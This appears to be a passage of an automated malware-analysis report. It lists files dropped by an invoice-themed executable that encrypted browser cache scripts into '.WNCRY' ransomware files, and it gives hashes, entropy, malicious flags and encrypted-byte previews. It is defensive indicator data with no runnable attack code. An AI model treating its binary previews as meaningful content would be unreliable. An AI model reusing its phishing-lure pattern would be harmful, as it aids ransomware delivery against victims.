                                                          SHA-256:33B8D5B1A7EE8A2F646610139C5D4782FD5A2E2CABFF57CE7BA7F0897A947396
                                                          SHA-512:569E7906E74950827F40157152DC5279F006D53DF200E6778C51661E920930CAB3F0D352770A43E54D9520C7C2B18FFEAE181B3C8978B9F84EB111B1D1753F59
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....L.r..u.X..+..[.z1Ps..X.5..".Y).v.[.B.u..#.Tu......6.Hw3.h.:(..>,..f.5.mDj7...wc1...(.y.!.....M....|..~...l81...l.....e.\..i...V..8.oo p.~.*6..S...%i.I{.V........#.'.;L{..;..C.......n.?.%.M..c....V..u.>..w]W7.A..1.a..3....G+..g.X.e..x.Uf.Q\...n....N..........R.8+2....e )...E....R_YS..|..U.?.i....G:r...z......C....$N.Tp.G=9./S...}`.....8]-.3..x.t~..M.3....F....-...o....,.d.el7..^....3....R"...<..O%9&.Y...Q.bg.O..5.......W..Q.{3.ZY...U>t)....}...I.e.....Y.I...|...*.'M..J........K)1...VF...r.z!V.^."....{..........^.8@......2JT.A...........<#z.lO.....{.?..B0Xgn...Ve0..........44[m..V..9...DX...l...bG...!_..b.8..=0..mG>..f.V...Gf....p.V..#..3802zR.^.uG.)...t.-....!.....4...Q.]H.....Y.j...c.wJ."8........}.......&..f.:E..<w...K...V .l:..(.Z.O.:@<P...,2......%..e............q...H..A./H)<...Qo.@)..O..H..`.H.g.|........j..5...:G...b..9r...Z.PK(cO....7.....C\.u.q!.......G.'.....O.r.....>..^GN..u.Q..vP..a4.Q...i..M;...sE.pj..Vm....K(.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\D_0mE1U1YmZvpLaz5wDHB6P-DAI.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):192872
                                                          Entropy (8bit):7.999060047902946
                                                          Encrypted:true
                                                          SSDEEP:3072:b/DWQZUWYUySdW41VaNQaC/QYIox5GltwU3PM6biPL5YdqKYMhJvPDO6U6tzEG3I:2JH7iW4zj9/Qboxs7tPM6buL5z7MzvLw
                                                          MD5:3BA6D669B9A240DBC6B55F894983370D
                                                          SHA1:BFC4442283CCAEF644DB1D696EDCA57AC883DCA3
                                                          SHA-256:33B8D5B1A7EE8A2F646610139C5D4782FD5A2E2CABFF57CE7BA7F0897A947396
                                                          SHA-512:569E7906E74950827F40157152DC5279F006D53DF200E6778C51661E920930CAB3F0D352770A43E54D9520C7C2B18FFEAE181B3C8978B9F84EB111B1D1753F59
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....L.r..u.X..+..[.z1Ps..X.5..".Y).v.[.B.u..#.Tu......6.Hw3.h.:(..>,..f.5.mDj7...wc1...(.y.!.....M....|..~...l81...l.....e.\..i...V..8.oo p.~.*6..S...%i.I{.V........#.'.;L{..;..C.......n.?.%.M..c....V..u.>..w]W7.A..1.a..3....G+..g.X.e..x.Uf.Q\...n....N..........R.8+2....e )...E....R_YS..|..U.?.i....G:r...z......C....$N.Tp.G=9./S...}`.....8]-.3..x.t~..M.3....F....-...o....,.d.el7..^....3....R"...<..O%9&.Y...Q.bg.O..5.......W..Q.{3.ZY...U>t)....}...I.e.....Y.I...|...*.'M..J........K)1...VF...r.z!V.^."....{..........^.8@......2JT.A...........<#z.lO.....{.?..B0Xgn...Ve0..........44[m..V..9...DX...l...bG...!_..b.8..=0..mG>..f.V...Gf....p.V..#..3802zR.^.uG.)...t.-....!.....4...Q.]H.....Y.j...c.wJ."8........}.......&..f.:E..<w...K...V .l:..(.Z.O.:@<P...,2......%..e............q...H..A./H)<...Qo.@)..O..H..`.H.g.|........j..5...:G...b..9r...Z.PK(cO....7.....C\.u.q!.......G.'.....O.r.....>..^GN..u.Q..vP..a4.Q...i..M;...sE.pj..Vm....K(.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):131672
                                                          Entropy (8bit):7.998758315323608
                                                          Encrypted:true
                                                          SSDEEP:3072:Cuoyh5x9MxVLgjmpEXZMuUCPsSsjnGc6BxLesC1klzt+xJrsIGo/mO:Cy5xezLgjmp0ZMuBPRsjnGdBxWkJtgJ5
                                                          MD5:D8146ECA3E2C57E2D4E1E50C215292B9
                                                          SHA1:22E2CF284A21DC30EED4CA58EA821217ADBAE6E3
                                                          SHA-256:811EAD7B7EFCAF0A8B8A811B3BA920AE82AD15AFFB0EC8D565B17ECDEFD9ED07
                                                          SHA-512:4EDCB4396FA453A37F863E5F29FEB7107C8B4B17ECB4B4734733F24D1E721A3E6303584AE13C4E49E06C6D43EBAF0F6CC56CAF72EE7AE0A0A0A1ECBB881FCC49
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....h.....Q.[.0t.H#.Z...iF.......^..b.3.`KTU4 ... ....Z...$[0... ...D.....T..s.7.../.u..cs...../..3..0.z?.[L..y._...q'....5o.K]...>.[...S.....R....hyY$.>Ptv..F.....*...b,L.s.........N.<..9.DpQ)....$..?[K..q.1......qW..t.... Q ...=..:.G. l....K.r.-......<.........C..G.qg[...N.....+*M..K.1.<.V^.}......N..P.......$............ .H.....*....B..k.R%7..O...... @),..T...Ie.kYy....e,.L<..LtR....M.U&.+k..F..Sq.0$3.}m.t.....?....<.w.N..H.D...$8..?.P'g.j. H07g..o.US.7i..V1.....i..R......2..T........zC......l .l/...e..WK..j..... ....x.y.1Y.R.]]~I.t....1...8}".xJ. ....$wr...9.I.n...T..h.........*.X.6.|o..;..F ..7t........X[..!......s.....F....Lqy.."....3!IR..>...h\.Z<....*#.1/.....x.. ...2.t...n.~..T4.2.(.4..r.:..2......i...T=>..'..e....Uk"...,._...0:.k.#......V.....{...BN.0.iM..m[[....[.+F.....*....n.6-K.:Z...p' ........0vvJ^CCo.6[(.5".v..Ny."....u&.R]......C.[.)MLD...^...1(..*p0/.|..b("....... .;..{Z.f.i..J..]DZw.. .i.....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):131672
                                                          Entropy (8bit):7.998758315323608
                                                          Encrypted:true
                                                          SSDEEP:3072:Cuoyh5x9MxVLgjmpEXZMuUCPsSsjnGc6BxLesC1klzt+xJrsIGo/mO:Cy5xezLgjmp0ZMuBPRsjnGdBxWkJtgJ5
                                                          MD5:D8146ECA3E2C57E2D4E1E50C215292B9
                                                          SHA1:22E2CF284A21DC30EED4CA58EA821217ADBAE6E3
                                                          SHA-256:811EAD7B7EFCAF0A8B8A811B3BA920AE82AD15AFFB0EC8D565B17ECDEFD9ED07
                                                          SHA-512:4EDCB4396FA453A37F863E5F29FEB7107C8B4B17ECB4B4734733F24D1E721A3E6303584AE13C4E49E06C6D43EBAF0F6CC56CAF72EE7AE0A0A0A1ECBB881FCC49
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....h.....Q.[.0t.H#.Z...iF.......^..b.3.`KTU4 ... ....Z...$[0... ...D.....T..s.7.../.u..cs...../..3..0.z?.[L..y._...q'....5o.K]...>.[...S.....R....hyY$.>Ptv..F.....*...b,L.s.........N.<..9.DpQ)....$..?[K..q.1......qW..t.... Q ...=..:.G. l....K.r.-......<.........C..G.qg[...N.....+*M..K.1.<.V^.}......N..P.......$............ .H.....*....B..k.R%7..O...... @),..T...Ie.kYy....e,.L<..LtR....M.U&.+k..F..Sq.0$3.}m.t.....?....<.w.N..H.D...$8..?.P'g.j. H07g..o.US.7i..V1.....i..R......2..T........zC......l .l/...e..WK..j..... ....x.y.1Y.R.]]~I.t....1...8}".xJ. ....$wr...9.I.n...T..h.........*.X.6.|o..;..F ..7t........X[..!......s.....F....Lqy.."....3!IR..>...h\.Z<....*#.1/.....x.. ...2.t...n.~..T4.2.(.4..r.:..2......i...T=>..'..e....Uk"...,._...0:.k.#......V.....{...BN.0.iM..m[[....[.+F.....*....n.6-K.:Z...p' ........0vvJ^CCo.6[(.5".v..Ny."....u&.R]......C.[.)MLD...^...1(..*p0/.|..b("....... .;..{Z.f.i..J..]DZw.. .i.....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\EYNLM9RfkEXFtD8WH1unvJjwzGA.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):17784
                                                          Entropy (8bit):7.990439122444194
                                                          Encrypted:true
                                                          SSDEEP:384:snGZJgePrlvFvkFMZ6X9a1dFZj5dgeSJ6+Q1yETPb8SIMuJicoF:snKJgeP/6X9afFXdr+hSIMuPK
                                                          MD5:E97C9CEEC102FDDC361C22F888765D94
                                                          SHA1:A904D289F3AA8D06E96CBF00542412CCD2461A12
                                                          SHA-256:F5A8077B0372A49FEA2FAAB3C9FB412CD48802B6CB8BA353A6F0A39E325C1DBA
                                                          SHA-512:C8FBE2BD7B20D802C8CE428E32479B373F075E461E345584BCCE95E052BEABD371EEC27159DA02582B84DC255A17099964B1FA208BF00B0E9BC0F3ABD85763EE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....]4.q.....[..3.G..*.k.....s9..).....s..1Q.V..:L.J4....r...+.'....G...y&..^.<N[..F..-.c..y.Z02E.9...H.,.5T.C.+..ZF.rC.yI<.0"..E...p|~.RQ.b.Ub....#.5...V.^/N.).I.t^.4.N._.4.9..T.s]..y...gvlq(/e.R?.:.s&.p.`j.q!(.9.Eg...(P..(..Yu...Op..fg......Q.c-........ZD..............r.[....'k.@..v.r....mL.....!..Q.l.b.]E`..._..3...K.......5.p.U}......N~....x.e".j.+...6*,..`o.~o4.k...^."F...c't.....G..Hu..A.{..o\......~.%\.......U.^..*.n.V..q2.JN...;.)....\..JS...kI..fm.........k..QZfU_[...w.83u...Wr......h*K.k...K.&.....)....&..;=.=ac...y..rB.yPQj..h...M(.....;.7...h.d..P.r.........0u-;4JM...f..TUn..`F..".=6HX..u............t9.A../..hBQ......H8...cP...3...Sb]!].]...f_ p....N....R7.5M...z.<..3..P..Y!^.&./U.2.r8..t.gM<".._../|...#]}.........Y'....~...Io.y.O...V.O.YV........U=....G.:Z.xf..,..g.Y....=4.._.. ls...(.w..._.N.F.<_?.'......".....p6F...(:<.~_.U.>.......Gi..V.o....q....c.c...'..3..I7.I.T(.j...8.Jn.`p+...a.)ZM..G...B.s.....8......-:H....*.q.A.~.sg.M7

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\EYNLM9RfkEXFtD8WH1unvJjwzGA.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):17784
                                                          Entropy (8bit):7.990439122444194
                                                          Encrypted:true
                                                          SSDEEP:384:snGZJgePrlvFvkFMZ6X9a1dFZj5dgeSJ6+Q1yETPb8SIMuJicoF:snKJgeP/6X9afFXdr+hSIMuPK
                                                          MD5:E97C9CEEC102FDDC361C22F888765D94
                                                          SHA1:A904D289F3AA8D06E96CBF00542412CCD2461A12
                                                          SHA-256:F5A8077B0372A49FEA2FAAB3C9FB412CD48802B6CB8BA353A6F0A39E325C1DBA
                                                          SHA-512:C8FBE2BD7B20D802C8CE428E32479B373F075E461E345584BCCE95E052BEABD371EEC27159DA02582B84DC255A17099964B1FA208BF00B0E9BC0F3ABD85763EE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....]4.q.....[..3.G..*.k.....s9..).....s..1Q.V..:L.J4....r...+.'....G...y&..^.<N[..F..-.c..y.Z02E.9...H.,.5T.C.+..ZF.rC.yI<.0"..E...p|~.RQ.b.Ub....#.5...V.^/N.).I.t^.4.N._.4.9..T.s]..y...gvlq(/e.R?.:.s&.p.`j.q!(.9.Eg...(P..(..Yu...Op..fg......Q.c-........ZD..............r.[....'k.@..v.r....mL.....!..Q.l.b.]E`..._..3...K.......5.p.U}......N~....x.e".j.+...6*,..`o.~o4.k...^."F...c't.....G..Hu..A.{..o\......~.%\.......U.^..*.n.V..q2.JN...;.)....\..JS...kI..fm.........k..QZfU_[...w.83u...Wr......h*K.k...K.&.....)....&..;=.=ac...y..rB.yPQj..h...M(.....;.7...h.d..P.r.........0u-;4JM...f..TUn..`F..".=6HX..u............t9.A../..hBQ......H8...cP...3...Sb]!].]...f_ p....N....R7.5M...z.<..3..P..Y!^.&./U.2.r8..t.gM<".._../|...#]}.........Y'....~...Io.y.O...V.O.YV........U=....G.:Z.xf..,..g.Y....=4.._.. ls...(.w..._.N.F.<_?.'......".....p6F...(:<.~_.U.>.......Gi..V.o....q....c.c...'..3..I7.I.T(.j...8.Jn.`p+...a.)ZM..G...B.s.....8......-:H....*.q.A.~.sg.M7

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\GW3DpE2qmyibnbFrEIzpiD0iGLk.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):776
                                                          Entropy (8bit):7.711524353727964
                                                          Encrypted:false
                                                          SSDEEP:12:bkEL7ILn5JuUNCCSuKise2tOE9jSBS6e0BjFZaZykjm41/5+hmvpbKfHMqA+Q3iH:bkYI3IDteY+g0HZaTjmI5YCpbC9A3ipJ
                                                          MD5:FC290A194C02E3C436B033E9482594F8
                                                          SHA1:2D85C81231D5844A3DA666943A082785A7F695B7
                                                          SHA-256:F54F223CF14436D2E25B87BFAEC81C9EB8EE186244F0F6868C8482EE8A506557
                                                          SHA-512:842E2A9B2964E4A268997C50881508EBAEB620BCAC5C8DD5BAEEC2837DBA49A1D5AC1F46B28080665BDFC901F00D268DB3E2C2D7F07F553E4F6751836F9AE286
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........m...^@o...h......I.|!.'A..l..9.}8n.WK...P..p.;..ze....k.Y2.$@.,.Il....s.....b......o.D...xeA ..~J..o.*.z...$.;7....Q-,..K>80v.Xk...k.X..w....;.MF.....!Q_k...._=.@}.."%.1.`...Nh.G}....h.[UR..bo....'.......T.z>.$.. .B..7.........W..!.n.o....o............L....C.=...jk.]stG....].?........,...l.z..Z.m{Is._.........+.....d...P.ad._;[\.<d}.....8$x#...]..llp=M.p...N.z..G. 3....+...........6&Ip..=W..qK.Ns%fN*...o.j......M9T.5.[X....(...f...?v.P..{..t.^e-..Y...*.<...6.Q.Z.}.O....[Z@..%...X.....Y......YyA.y=..~.w#...[..Z1p/.l.s......z.$f:#..n..n..s....O.[6......++....._...&.........SR..6....`..M.,Z2....@LG..p.m.h....C.s.!..D.....-........Cx. ]..w......u.".j.......XHy........n...Q...y.q.....2.]......I.....a`,........@i.(

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\GW3DpE2qmyibnbFrEIzpiD0iGLk.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):776
                                                          Entropy (8bit):7.711524353727964
                                                          Encrypted:false
                                                          SSDEEP:12:bkEL7ILn5JuUNCCSuKise2tOE9jSBS6e0BjFZaZykjm41/5+hmvpbKfHMqA+Q3iH:bkYI3IDteY+g0HZaTjmI5YCpbC9A3ipJ
                                                          MD5:FC290A194C02E3C436B033E9482594F8
                                                          SHA1:2D85C81231D5844A3DA666943A082785A7F695B7
                                                          SHA-256:F54F223CF14436D2E25B87BFAEC81C9EB8EE186244F0F6868C8482EE8A506557
                                                          SHA-512:842E2A9B2964E4A268997C50881508EBAEB620BCAC5C8DD5BAEEC2837DBA49A1D5AC1F46B28080665BDFC901F00D268DB3E2C2D7F07F553E4F6751836F9AE286
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........m...^@o...h......I.|!.'A..l..9.}8n.WK...P..p.;..ze....k.Y2.$@.,.Il....s.....b......o.D...xeA ..~J..o.*.z...$.;7....Q-,..K>80v.Xk...k.X..w....;.MF.....!Q_k...._=.@}.."%.1.`...Nh.G}....h.[UR..bo....'.......T.z>.$.. .B..7.........W..!.n.o....o............L....C.=...jk.]stG....].?........,...l.z..Z.m{Is._.........+.....d...P.ad._;[\.<d}.....8$x#...]..llp=M.p...N.z..G. 3....+...........6&Ip..=W..qK.Ns%fN*...o.j......M9T.5.[X....(...f...?v.P..{..t.^e-..Y...*.<...6.Q.Z.}.O....[Z@..%...X.....Y......YyA.y=..~.w#...[..Z1p/.l.s......z.$f:#..n..n..s....O.[6......++....._...&.........SR..6....`..M.,Z2....@LG..p.m.h....C.s.!..D.....-........Cx. ]..w......u.".j.......XHy........n...Q...y.q.....2.]......I.....a`,........@i.(

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\KF9j9oJUfaaKiX-84yf0U337ge8.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1749912
                                                          Entropy (8bit):7.999908492734295
                                                          Encrypted:true
                                                          SSDEEP:49152:7N21d2SBTQdfmbzAjkk48BS8BfwPAjeTZPa54DDypwTXl:7kvhBufgzP8M8PUPMjeTXl
                                                          MD5:791E4F1205E1F483CBCA4FD047FE8E56
                                                          SHA1:FED8B9D17B6A15A15E1B4577213ED796941F93C7
                                                          SHA-256:9F8F97E2F426539A44D1DA95E45F716EB3F74BE71FE7518FE588ACFB2F393047
                                                          SHA-512:C6B78889E310195E7D5981F59BB23F4916FD2B5A9B1AC8FD76887128898606B7A9820A9DA70AE50D86A45AABBA59125D9FF60E2083AC56BE6118F890203D5568
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....q.pM.Qi.Z...0..K....#......!j^..L...:<.}Dj:.6.=..~.dR.,.+..I2.k.w...0Z.[j....G......%W[7KZB6{eK{SC..U.\...A.b...?g.."..<.,(.........N..#...1...H+>>.......k.....)...C..c..#.Xj........J0.xK~.qm.>.bh..)o?.@.s.....A....FPB4#,.......^...~:]..p.M....{..........0.ig}d.65o...Cr2..C...!.<.5..t......d.y'?.UO....;1....(..T6."...{..(...I..#()....(e.{.s......z/....'.Si@.>.Ez...)......?2.y.<.9...{3.jm.I.H.u.%BH........ou...X....Q...j[..)._..-...Y......Do[\....M....AC,.f....@W..2..........H7.FN\.G..R?\.9_..X......~..>..}.f.n.MP..p.W["-Ckf.6...+.b.. `..&"*:O.`.V..s....6.....`.*F$..R....7.D.H..l.-.......Y@.p....i=@..;...N....7..Q.3..Ghl.m..I0.(..x.;.....A.s. 9.8`...N..y@*a.@1M..s]....L...d...F#.....X......Y.Dpq.7!.W[.z{H.2g..V..o*..'{....M.9.b...V.3......W...].Yh...3b.+...i...#.B....[...Mh..G./4/.......?..)...w.k..~...5......|.........ax.F..(8.K..g...b.m..y..P..>E...[...5Q...J...&4V..8....r.w......f..H.P......W.t.os.y....a..<@o..,r...S..ZK

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\KF9j9oJUfaaKiX-84yf0U337ge8.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1749912
                                                          Entropy (8bit):7.999908492734295
                                                          Encrypted:true
                                                          SSDEEP:49152:7N21d2SBTQdfmbzAjkk48BS8BfwPAjeTZPa54DDypwTXl:7kvhBufgzP8M8PUPMjeTXl
                                                          MD5:791E4F1205E1F483CBCA4FD047FE8E56
                                                          SHA1:FED8B9D17B6A15A15E1B4577213ED796941F93C7
                                                          SHA-256:9F8F97E2F426539A44D1DA95E45F716EB3F74BE71FE7518FE588ACFB2F393047
                                                          SHA-512:C6B78889E310195E7D5981F59BB23F4916FD2B5A9B1AC8FD76887128898606B7A9820A9DA70AE50D86A45AABBA59125D9FF60E2083AC56BE6118F890203D5568
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....q.pM.Qi.Z...0..K....#......!j^..L...:<.}Dj:.6.=..~.dR.,.+..I2.k.w...0Z.[j....G......%W[7KZB6{eK{SC..U.\...A.b...?g.."..<.,(.........N..#...1...H+>>.......k.....)...C..c..#.Xj........J0.xK~.qm.>.bh..)o?.@.s.....A....FPB4#,.......^...~:]..p.M....{..........0.ig}d.65o...Cr2..C...!.<.5..t......d.y'?.UO....;1....(..T6."...{..(...I..#()....(e.{.s......z/....'.Si@.>.Ez...)......?2.y.<.9...{3.jm.I.H.u.%BH........ou...X....Q...j[..)._..-...Y......Do[\....M....AC,.f....@W..2..........H7.FN\.G..R?\.9_..X......~..>..}.f.n.MP..p.W["-Ckf.6...+.b.. `..&"*:O.`.V..s....6.....`.*F$..R....7.D.H..l.-.......Y@.p....i=@..;...N....7..Q.3..Ghl.m..I0.(..x.;.....A.s. 9.8`...N..y@*a.@1M..s]....L...d...F#.....X......Y.Dpq.7!.W[.z{H.2g..V..o*..'{....M.9.b...V.3......W...].Yh...3b.+...i...#.B....[...Mh..G./4/.......?..)...w.k..~...5......|.........ax.F..(8.K..g...b.m..y..P..>E...[...5Q...J...&4V..8....r.w......f..H.P......W.t.os.y....a..<@o..,r...S..ZK

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\Kwh038ybdvX_puLwdopqHydJtVM.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):467448
                                                          Entropy (8bit):7.999567972596184
                                                          Encrypted:true
                                                          SSDEEP:12288:ElF+lvd4NJJD/Lg5147lWVtBFjsD/04Fnt+cFF:EMvdylDS4WIt+cr
                                                          MD5:DBFD72E73D40344789C8345BDC5097ED
                                                          SHA1:B361292EE4DF06768E421ED002C21B4CC7A513CE
                                                          SHA-256:AA7336777EFCBDBC05CFEA4487D1B5C91C3CBAD7BC9F5405A30A6AFA93E8A50B
                                                          SHA-512:236C1491C33E5DFBB698D81878EB0CA601415FFCC2C46B9D544603182BB0FF3CC9FE0CA04F5B83D639EA20A48AF28C19918E56F786DA5E55746895261F8B81AB
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....M8.....y`Dc..2:.".........I..^..Z.F........=.|-lt.".....j...v.....$O.FS....D.G..|.w;].!..s.K./..[.%..B..k`.RC.30AC[..K..g...OMV.......=....pEFk.v...op3.o..P...8h..rN.d.......).~E.......\..X...`.E.e..5}..XZf<_K.....Q.......$..G..y......B+.6>b......... .......76..e..!.....1.U.Vwn2..1..R..yr.k3.....[..J..WE...ngu....sW......}.x.{V....,u....8^...L...J7H.&6=.. .........$....bK...Z.8p.,O.q.....8jk.@.q.%o.k..#>.6[..D.K#.ny.A>...7..l........P..... w.o6ItHz.{C....$\._j......x...gt.P.LP..\."....Z.....|.t......[y.....n.-9._[r...s..*X.&u....|w.a..g%H.)...n.0.%.pb......g..p..aW8Pk..<c..-.t.B-.;`.l.`.*[.q7..#l...C..Y.5a....uK2O&m.$.Q.1G.y.a..fy....h..*...#.4..")..:.N..;...&at.....Z.z......wH....8...>.C^.p.G.:.....P....'...S...?b.=.......8...>....5..@g.3-...Z7..>......N.!<....;#.eR....L..O..+....Y.^..~E.C.)q&..]...;W..aTF|..s....!.....A8.*7X.....D.qv..E4(6%A.Z.W...Q.m........g@^Ys.Q.G. .....j..........M.=e...S.Fk..L......Z.'k.h.....S.ys.n/4...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\Kwh038ybdvX_puLwdopqHydJtVM.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):467448
                                                          Entropy (8bit):7.999567972596184
                                                          Encrypted:true
                                                          SSDEEP:12288:ElF+lvd4NJJD/Lg5147lWVtBFjsD/04Fnt+cFF:EMvdylDS4WIt+cr
                                                          MD5:DBFD72E73D40344789C8345BDC5097ED
                                                          SHA1:B361292EE4DF06768E421ED002C21B4CC7A513CE
                                                          SHA-256:AA7336777EFCBDBC05CFEA4487D1B5C91C3CBAD7BC9F5405A30A6AFA93E8A50B
                                                          SHA-512:236C1491C33E5DFBB698D81878EB0CA601415FFCC2C46B9D544603182BB0FF3CC9FE0CA04F5B83D639EA20A48AF28C19918E56F786DA5E55746895261F8B81AB
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....M8.....y`Dc..2:.".........I..^..Z.F........=.|-lt.".....j...v.....$O.FS....D.G..|.w;].!..s.K./..[.%..B..k`.RC.30AC[..K..g...OMV.......=....pEFk.v...op3.o..P...8h..rN.d.......).~E.......\..X...`.E.e..5}..XZf<_K.....Q.......$..G..y......B+.6>b......... .......76..e..!.....1.U.Vwn2..1..R..yr.k3.....[..J..WE...ngu....sW......}.x.{V....,u....8^...L...J7H.&6=.. .........$....bK...Z.8p.,O.q.....8jk.@.q.%o.k..#>.6[..D.K#.ny.A>...7..l........P..... w.o6ItHz.{C....$\._j......x...gt.P.LP..\."....Z.....|.t......[y.....n.-9._[r...s..*X.&u....|w.a..g%H.)...n.0.%.pb......g..p..aW8Pk..<c..-.t.B-.;`.l.`.*[.q7..#l...C..Y.5a....uK2O&m.$.Q.1G.y.a..fy....h..*...#.4..")..:.N..;...&at.....Z.z......wH....8...>.C^.p.G.:.....P....'...S...?b.=.......8...>....5..@g.3-...Z7..>......N.!<....;#.eR....L..O..+....Y.^..~E.C.)q&..]...;W..aTF|..s....!.....A8.*7X.....D.qv..E4(6%A.Z.W...Q.m........g@^Ys.Q.G. .....j..........M.=e...S.Fk..L......Z.'k.h.....S.ys.n/4...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\KzWxoKDHqNy24XFwlA6xWw89_DA.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):9160
                                                          Entropy (8bit):7.9806364551141735
                                                          Encrypted:false
                                                          SSDEEP:96:oRjR9d0YDf2T3kUFS1bzOOkx3aWd6g+qNMua/lE5K86QCZY4BRW5OticYayyXX2O:qdJ47FSuW9N+JWbEcYayEG7u1C8KPO7z
                                                          MD5:8BD14082EEEA4077DC76AD1DB215A8BE
                                                          SHA1:E1158DDC694FC0E7B98B9F8CAE3CAA34A8D421EC
                                                          SHA-256:59612FD30F78D4C9A5AC38992410A0333C6B0E072EEAE23BD4BA3EA9D7EC59E7
                                                          SHA-512:804B08CB5BF8C5ED9F37C937994912A198818536FD90CECC75DBE3528DDEE05E9EEBAB87F492B55F2B550EAC8205700683DC2D65E4E4D17116225C20D5D1DCDB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....?.*..X...\...U...O....G..?..Z.....rg0F.]&x.SN(.d..$..3...i...i.90.].P.....A>.|...8-..n..$.r.LQ..N........\K)m.*.(qk.........S.....ZHm....1G_kw...*....g....V.`.H.4.#X..[z......'...d..h....d.#p..fPsA.>.%.1..A...).c.....\I..9{...R....:Go....G..-....."......}O.7.U.i.$.s....& .:..=..z..*b..4..g..Q.*..........B$.=RW.n..p*............F._......F.z....P...}...K.z.R.d.y.. .....(.....e;.uge..mAP.4}3-.......r..7I.x.....7........)qt.k...Bv........:....V.>..&.....Z..9.N..E.G.....xT..\.V...6....AK.5.....q.[....(._..X;.m....J%.....7.J.....V.,}Z..J.cM.9..<.:.b@...ag>...&d.O..Q.k......_.....Z+J.X...Af.d.|....Z..m$..3..v..4..8....zT....C...T}.5.Ho....%..O..ko..$R.Z..;.#...SB...1.#......geO%.L..,h...L2..c.....HV5P........ .lf;....8.:..._.......4..At.....LV....G...I#.h.P#....l.....K...l:s.?..Z...)q{C.*g..N..TK?H.R....U`....-......wt/?.p.<..]..b`...[...=..r...%3......1,..i.'..<..Ns.5y._.U_..:+.)....]...........U'%...i.d..F.....^.7..L

